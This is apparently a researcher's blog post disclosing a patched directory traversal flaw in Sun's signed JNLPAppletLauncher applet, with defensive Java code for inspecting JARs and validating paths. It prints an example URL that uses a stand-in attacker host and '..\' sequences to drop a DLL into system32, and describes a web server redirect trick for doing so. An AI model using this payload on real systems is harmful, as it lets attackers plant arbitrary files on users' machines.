If you read my review of the Web Application Hacker's Handbook you may remember I made the following point:

The authors talk about repurposing ActiveX controls but do not mention that this also applies to signed Java applets, which can also expose dangerous methods in exactly the same way.

In this post I'm going to discuss a security flaw in a Java applet signed by Sun Microsystems. The vulnerability lets us drop an arbitrary file to an arbitrary location on the file system on Windows platforms, subject to the user's permissions and, if in IE7, depending on whether Protected Mode is on or not. The applet in question has been updated to fix this issue and the NGS advisory is here.

Before I talk about the applet itself, let's take a brief look at the components of a signed JAR:

- A signed Java applet consists of a JAR file (a zip archive) containing the application class files, a manifest, one or more signature files and a signature block.

- The manifest holds a list of files in the JAR that have been signed and a corresponding digest for each file, typically SHA1.

- A signature file consists of a main section, which includes information supplied by the signer but not specific to any particular JAR file entry, followed by a list of individual entries whose names must also be present in the manifest file. Each individual entry must contain at least the digest of the corresponding entry in the manifest file.

- The signature block contains the binary signature of the signature file and all public certificates needed for verification.
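To make that layout concrete, here is a minimal sketch that sorts JAR entry names into the parts listed above. The class and method names (`SignedJarParts`, `classify`) are my own, purely for illustration. It assumes the usual naming convention: the manifest at `META-INF/MANIFEST.MF`, signature files ending in `.SF`, and signature blocks ending in `.RSA`, `.DSA` or `.EC`, all directly inside `META-INF/`.

```java
import java.util.Enumeration;
import java.util.Locale;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

// Hypothetical helper (not part of any Sun tool): labels JAR entries by role.
final class SignedJarParts {
    private static final String META = "META-INF/";

    static String classify(String entryName) {
        String upper = entryName.toUpperCase(Locale.ROOT);
        if (upper.equals(META + "MANIFEST.MF")) {
            return "manifest";
        }
        // Signature-related files live directly in META-INF/, not in subdirectories.
        boolean directlyInMeta = upper.startsWith(META)
                && upper.indexOf('/', META.length()) < 0;
        if (directlyInMeta) {
            if (upper.endsWith(".SF")) {
                return "signature file";
            }
            if (upper.endsWith(".RSA") || upper.endsWith(".DSA") || upper.endsWith(".EC")) {
                return "signature block";
            }
        }
        return "content";
    }

    public static void main(String[] args) throws Exception {
        if (args.length != 1) {
            System.err.println("usage: java SignedJarParts <path-to-jar>");
            return;
        }
        try (JarFile jar = new JarFile(args[0])) {
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                String name = entries.nextElement().getName();
                System.out.println(classify(name) + "\t" + name);
            }
        }
    }
}
```

Running it against any signed applet JAR should show one manifest, at least one signature file and signature block pair, and everything else as content.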

For anyone interested in the verification process, this paragraph from the Java Plug-in Developer's Guide gives a good description. In practice, the user is presented with a dialog like this:

Contrast this to the dialog box that IE7 presents when installing a new ActiveX control (and note that I clicked for "more options" to show the always install/never install options):

The difference from a security perspective is obvious*: Sun want you to always trust the publisher, Microsoft want to ask you every time. For anyone wondering if you only see this behaviour with Sun-signed applets, this is the default behaviour for all signed applets (don't believe me? Go check out the Hushmail applet). It is worth noting, however, that the checkbox is only ticked if the certificate chain verifies all the way up to a trusted Root CA certificate. If the certificate has expired or is self-signed, the checkbox will not be ticked.

This is a pretty interesting design decision. If you click "Run" in the Java dialog box above, you're allowing all existing and future applets signed by the same publisher (strictly the same certificate) to automatically run regardless of the website they are loaded from and the parameters they are instantiated with. So even if you have some level of confidence in the applet that you are about to run, if the publisher produced a buggy applet and signed it with the same certificate, a malicious website can repurpose it and silently use it against you. Scary, huh? This is one of those usability vs. security trade-offs**. Even if the applet is cached on your machine, if the certificate is not in the trusted store, you will be prompted every time it's instantiated. If you're the IT manager of a large corporation and your Intranet homepage has a signed applet, you probably don't want your users to see a security warning every time they open a browser.
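Since the trust decision hangs on the signing certificate rather than on the applet, it can be handy to see who actually signed a given JAR. Here's a rough sketch using the standard `java.util.jar` API; the class and method names (`JarSigners`, `signerSubjects`) are made up for this post. It only reports the subject of each signer's certificate. It does not decide whether the chain leads to a trusted root, which is what the plug-in dialog cares about.

```java
import java.io.IOException;
import java.io.InputStream;
import java.security.CodeSigner;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;
import java.util.Enumeration;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

// Hypothetical helper: collects the subject names of the certificates that signed a JAR.
final class JarSigners {
    static Set<String> signerSubjects(String jarPath) throws IOException {
        Set<String> subjects = new LinkedHashSet<>();
        // verify=true makes JarFile check digests and signatures as entries are read.
        try (JarFile jar = new JarFile(jarPath, true)) {
            byte[] buf = new byte[8192];
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (entry.isDirectory()) {
                    continue;
                }
                // Signer information is only available once the entry has been read
                // to the end; a tampered entry throws SecurityException here.
                try (InputStream in = jar.getInputStream(entry)) {
                    while (in.read(buf) != -1) {
                        // discard the data, we only want verification to run
                    }
                }
                CodeSigner[] signers = entry.getCodeSigners();
                if (signers == null) {
                    continue; // unsigned entry
                }
                for (CodeSigner signer : signers) {
                    List<? extends Certificate> chain =
                            signer.getSignerCertPath().getCertificates();
                    if (!chain.isEmpty() && chain.get(0) instanceof X509Certificate) {
                        X509Certificate cert = (X509Certificate) chain.get(0);
                        subjects.add(cert.getSubjectX500Principal().getName());
                    }
                }
            }
        }
        return subjects;
    }
}
```

An empty result means no entry in the JAR carried a signature. Two applets that return the same subject may still have been signed with different certificates, so treat this as a quick look rather than a trust check.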

Now for the actual vulnerability... The JNLPAppletLauncher is a "general purpose JNLP-based applet launcher class for deploying applets that use extension libraries containing native code." What this means is that an unsigned applet that requires a signed native code extension such as Java 3D can be launched by invoking the JNLPAppletLauncher and passing it a JNLP file that references both the original applet and the extension. There are some demos here; FourByFour is a great example of Java 3D in the browser (though tic-tac-toe on a 4x4x4 cube... it's not exactly Guitar Hero III).

The JNLPAppletLauncher had a simple directory traversal flaw exploitable on Windows platforms. The applet reads extensions from the JNLP file, whose location is passed as a parameter during the applet instantiation. The extension path is examined for the parent path sequence "../". On Windows of course, this is insufficient - the failure to check for "..\" ultimately allows us to drop an arbitrary file on the file system. The extension path is concatenated to the base URL so we end up with something like:

http://attackerdomain/..\..\..\..\..\..\windows\system32\file.dll

If you're thinking this is an invalid URL, you're right. You'll need a hacked up web server to honour it, or at least the ability to modify the httpd.conf on an Apache server. A request for a file below the web root will cause Apache to generate an HTTP 400 (Bad Request). We can translate this into an HTTP 302 (Redirect) via the ErrorDocument directive. The applet will follow the redirection and download the content to the path "..\..\..\..\..\..\windows\system32\file.dll".


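To show why looking only for "../" falls short, here is a minimal sketch contrasting that style of check with a stricter one. To be clear, this is not the JNLPAppletLauncher source and not Sun's fix; the class and method names (`TraversalCheck`, `naiveIsSafe`, `stricterIsSafe`) are mine. The stricter version is just one reasonable approach: treat both slash styles as separators, resolve the path against the intended directory, and make sure the result is still inside it.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

// Illustrative only: not the launcher's actual code.
final class TraversalCheck {

    // The kind of check described above: rejects "../" but never looks for "..\".
    static boolean naiveIsSafe(String relativePath) {
        return !relativePath.contains("../");
    }

    // One possible stricter check: normalise separators, resolve against the
    // base directory, and require the result to stay strictly inside it.
    static boolean stricterIsSafe(Path baseDir, String relativePath) {
        try {
            String unified = relativePath.replace('\\', '/');
            Path base = baseDir.toAbsolutePath().normalize();
            Path target = base.resolve(unified).normalize();
            return target.startsWith(base) && !target.equals(base);
        } catch (InvalidPathException e) {
            return false; // anything the platform cannot parse is rejected
        }
    }

    public static void main(String[] args) {
        String evil = "..\\..\\..\\..\\..\\..\\windows\\system32\\file.dll";
        Path cache = Paths.get("cache"); // hypothetical download directory
        System.out.println("naive check accepts:    " + naiveIsSafe(evil));
        System.out.println("stricter check accepts: " + stricterIsSafe(cache, evil));
    }
}
```

The point of resolving first and comparing afterwards is that you no longer need to enumerate every spelling of "go up a directory"; you just ask where the path actually ends up.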

Sun have now fixed this issue so the applet you can retrieve from https://applet-launcher.dev.java.net is no longer vulnerable. Since the JAR is not an officially supported product, there will be no Sun Alert released. And given the prerequisites for this attack (you have to coerce a user into visiting a malicious web site, then have the user agree to run the control [unless of course they have trusted Sun as a publisher], then you need a hacked up web server), I do not consider this issue to be especially serious. That said, it's worth checking your Java trusted certificate store to see exactly which publishers you currently trust. You can get to this via the Java Control Panel (C:\Windows\system32\javacpl.cpl):

Anyway I'll be revisiting signed applets in a future post. In the meantime, my advice is beware of always trusting the publisher.

Cheers

John